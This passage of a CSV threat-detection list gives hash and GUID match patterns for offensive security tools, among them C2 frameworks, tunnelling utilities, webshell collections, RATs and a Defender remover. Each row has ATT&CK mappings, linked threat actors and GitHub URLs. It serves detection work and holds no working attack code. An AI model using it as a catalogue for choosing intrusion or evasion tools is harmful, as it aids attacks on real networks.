SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28442" "*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*",".{0,1000}6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","28444" "*6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7*",".{0,1000}6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28445" "*6c07205f852af6214909bb887cc94df51f6dd4fee6d9b83c292d70a0970b0bc0*",".{0,1000}6c07205f852af6214909bb887cc94df51f6dd4fee6d9b83c292d70a0970b0bc0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28447" "*6c07e0eb6cf4e7ed13bc4573817151451342c822ea9d52becb1865e2a761cb57*",".{0,1000}6c07e0eb6cf4e7ed13bc4573817151451342c822ea9d52becb1865e2a761cb57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28448" "*6C0942A1-C852-40F4-95F9-953510BD102D*",".{0,1000}6C0942A1\-C852\-40F4\-95F9\-953510BD102D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28449" "*6c0aaa05f8c75791a7bd4e950183d25276d70476a4ba243801dd47e5329a185d*",".{0,1000}6c0aaa05f8c75791a7bd4e950183d25276d70476a4ba243801dd47e5329a185d.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","28450" "*6c0ab655196a8fa5f9829ae8533eed10080676eb37f8603ffe159e82e64836ea*",".{0,1000}6c0ab655196a8fa5f9829ae8533eed10080676eb37f8603ffe159e82e64836ea.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28451" "*6c0eeb395a6d674e89bc6113467923e8b23a4ed4ade5dd5e5f0c260bd8493efa*",".{0,1000}6c0eeb395a6d674e89bc6113467923e8b23a4ed4ade5dd5e5f0c260bd8493efa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28452" "*6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b*",".{0,1000}6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28453" "*6c152888df8ae98171b78aeea0a6d9935b371eaded61a067b82c1cec8edc0844*",".{0,1000}6c152888df8ae98171b78aeea0a6d9935b371eaded61a067b82c1cec8edc0844.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28454" "*6c174114cc8159ea4a8614b5418fa6e6405c42c64675657f69b1ae1839dd0a70*",".{0,1000}6c174114cc8159ea4a8614b5418fa6e6405c42c64675657f69b1ae1839dd0a70.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - 
T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28455" "*6c1ae2e334c3636ebebb7067a21ecd2432d882d49b3f8f740b4e94e8aa64dc8c*",".{0,1000}6c1ae2e334c3636ebebb7067a21ecd2432d882d49b3f8f740b4e94e8aa64dc8c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28456" "*6c1b2c4d2b69d38a438af8d9f8c8aa411111d35b03b988f7a3dc4b9aec0605c6*",".{0,1000}6c1b2c4d2b69d38a438af8d9f8c8aa411111d35b03b988f7a3dc4b9aec0605c6.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28457" "*6c2ceb31348ef2780f96483fc744807651cc3a72d1dceb808ca24bc36bc08bec*",".{0,1000}6c2ceb31348ef2780f96483fc744807651cc3a72d1dceb808ca24bc36bc08bec.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28461" 
"*6c3c38f6c80a0c6cc5c2527990decec2c5ba98c368abf75ae9fd44c4c3303443*",".{0,1000}6c3c38f6c80a0c6cc5c2527990decec2c5ba98c368abf75ae9fd44c4c3303443.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28463" "*6C3D086F568E4DCF1379D750C48464FC1F737326E2547DEE1EAFFD00F19FF16C*",".{0,1000}6C3D086F568E4DCF1379D750C48464FC1F737326E2547DEE1EAFFD00F19FF16C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","28464" "*6c40e6c2415953b0716a499a3b8b5e5541a5c4a523971ff7c3076d892a3a25d3*",".{0,1000}6c40e6c2415953b0716a499a3b8b5e5541a5c4a523971ff7c3076d892a3a25d3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28468" "*6c43f8eb224f04c2d5c0dc415e16db9151ab0739c7dc12530be41ff61682ffbe*",".{0,1000}6c43f8eb224f04c2d5c0dc415e16db9151ab0739c7dc12530be41ff61682ffbe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28469" "*6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee*",".{0,1000}6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","28470" "*6c4696003fe73566fe0a2c42a4bbd3171f576fb8b0175fbcc13381109fd632b2*",".{0,1000}6c4696003fe73566fe0a2c42a4bbd3171f576fb8b0175fbcc13381109fd632b2.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28472" "*6c4c9900e2d006a9b7dde59982905c5c6354eb8de5ceae88f1da96161756042d*",".{0,1000}6c4c9900e2d006a9b7dde59982905c5c6354eb8de5ceae88f1da96161756042d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","28474" "*6c4f7d10004fd5cbe197202612072cab361f1d39df0355b5a2f1d01437316128*",".{0,1000}6c4f7d10004fd5cbe197202612072cab361f1d39df0355b5a2f1d01437316128.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - 
TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28475" "*6c615c17a6bd1fc0ce0f1add0b254e60fc162e44d94afc77ac91c2d3e9bb65be*",".{0,1000}6c615c17a6bd1fc0ce0f1add0b254e60fc162e44d94afc77ac91c2d3e9bb65be.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28480" "*6c66a39e447a7bfd2e7c2fab4a3f05ba7e97d1a1cd88a384ee6c703f652d81ed*",".{0,1000}6c66a39e447a7bfd2e7c2fab4a3f05ba7e97d1a1cd88a384ee6c703f652d81ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28481" "*6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42*",".{0,1000}6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28482" "*6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073*",".{0,1000}6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#filehash","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","28483" "*6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed*",".{0,1000}6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28484" 
"*6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e*",".{0,1000}6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","28485" "*6c7b6faf5a493f036e6b69a0f4c9c7f1b86c068a56ce4d8d9a92c8ebde0eae99*",".{0,1000}6c7b6faf5a493f036e6b69a0f4c9c7f1b86c068a56ce4d8d9a92c8ebde0eae99.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#filehash","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","28486" "*6c7bf018f8117a161751d7a7d3e3a6356763ba65f51db519ad72cdf8168da9e8*",".{0,1000}6c7bf018f8117a161751d7a7d3e3a6356763ba65f51db519ad72cdf8168da9e8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28487" "*6c875bb7e4b35df7144d52eac30c8e2e1fd2ca0e60edbfbfb60043b75d6f0cc5*",".{0,1000}6c875bb7e4b35df7144d52eac30c8e2e1fd2ca0e60edbfbfb60043b75d6f0cc5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 
TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28490" "*6C8ECB51-EECE-49C3-89EC-CB0AAECCFF7E*",".{0,1000}6C8ECB51\-EECE\-49C3\-89EC\-CB0AAECCFF7E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28492" "*6c984cacd4950905c61a2c6d962a8a9e63f40d0d9d834b26f453296d25356ce8*",".{0,1000}6c984cacd4950905c61a2c6d962a8a9e63f40d0d9d834b26f453296d25356ce8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28495" "*6C9CF6A0-C098-4341-8DD1-2FCBA9594067*",".{0,1000}6C9CF6A0\-C098\-4341\-8DD1\-2FCBA9594067.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#GUIDproject","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","28497" 
"*6ca3271cea48f57c98eb500056d4164215198af09175d1f88b79189523ae56af*",".{0,1000}6ca3271cea48f57c98eb500056d4164215198af09175d1f88b79189523ae56af.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28498" "*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*",".{0,1000}6CAFC0C6\-A428\-4D30\-A9F9\-700E829FEA51.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","#GUIDproject","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","28500" "*6cb25fb99c1fc66e8b2f04aa80840355e137f5248f62b53422d3ab055c9e7c00*",".{0,1000}6cb25fb99c1fc66e8b2f04aa80840355e137f5248f62b53422d3ab055c9e7c00.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28501" "*6cb434e48f7e61714d422dfd0cb46d1afe621090e1b432d5cf0030856f17d42a*",".{0,1000}6cb434e48f7e61714d422dfd0cb46d1afe621090e1b432d5cf0030856f17d42a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28502" "*6cb8b44918b571059ba3d3fd542a0fd60b2bc850d999d6eafdd80af061818bec*",".{0,1000}6cb8b44918b571059ba3d3fd542a0fd60b2bc850d999d6eafdd80af061818bec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed 
used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28503" "*6cbd17824d093c835adebf81d9d2e3c1fd56db6dcec461c1cf72f0e3b5ba52f5*",".{0,1000}6cbd17824d093c835adebf81d9d2e3c1fd56db6dcec461c1cf72f0e3b5ba52f5.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","#filehash","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","28504" "*6cbd379b042c7b27ba4d446c5cbf755b9991d357895f99076ac0a993f80c4fb9*",".{0,1000}6cbd379b042c7b27ba4d446c5cbf755b9991d357895f99076ac0a993f80c4fb9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28505" "*6cbe75eb761973426dd29855c69210d047b19883320e6bf912df6edafe4826a9*",".{0,1000}6cbe75eb761973426dd29855c69210d047b19883320e6bf912df6edafe4826a9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28506" "*6cbf3184ec914574bd0d30126a34ee7e0d26ddbc7ebb8a6fa1fe294825600a5b*",".{0,1000}6cbf3184ec914574bd0d30126a34ee7e0d26ddbc7ebb8a6fa1fe294825600a5b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28507" "*6cc5645274bdacebf9b7d37b49f7440184722f021e13c407df2f7fc71c2b8e5f*",".{0,1000}6cc5645274bdacebf9b7d37b49f7440184722f021e13c407df2f7fc71c2b8e5f.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","28510" "*6cc6bd374582e6fe7159dcb2d665fafc657053593ffeafc2f4135cae4e5a89cd*",".{0,1000}6cc6bd374582e6fe7159dcb2d665fafc657053593ffeafc2f4135cae4e5a89cd.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28511" "*6cc72a74c01d04cf06cca303ba6a584a4261829d88fde64592e5a04cb0a16522*",".{0,1000}6cc72a74c01d04cf06cca303ba6a584a4261829d88fde64592e5a04cb0a16522.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","28512" 
"*6cd6746c91e7cbeed9a2abc1b32dc169c5cac487b896033e54f128dd0a960db5*",".{0,1000}6cd6746c91e7cbeed9a2abc1b32dc169c5cac487b896033e54f128dd0a960db5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28513" "*6cdd4782f5551b4f3005974733eab16d0db8b2b3e385437af8f0791b06d7e431*",".{0,1000}6cdd4782f5551b4f3005974733eab16d0db8b2b3e385437af8f0791b06d7e431.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28514" "*6ce287235d5d056b96a9a99c3a0ce5a209f43745c1101d8e18bd95ea6e7dee65*",".{0,1000}6ce287235d5d056b96a9a99c3a0ce5a209f43745c1101d8e18bd95ea6e7dee65.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 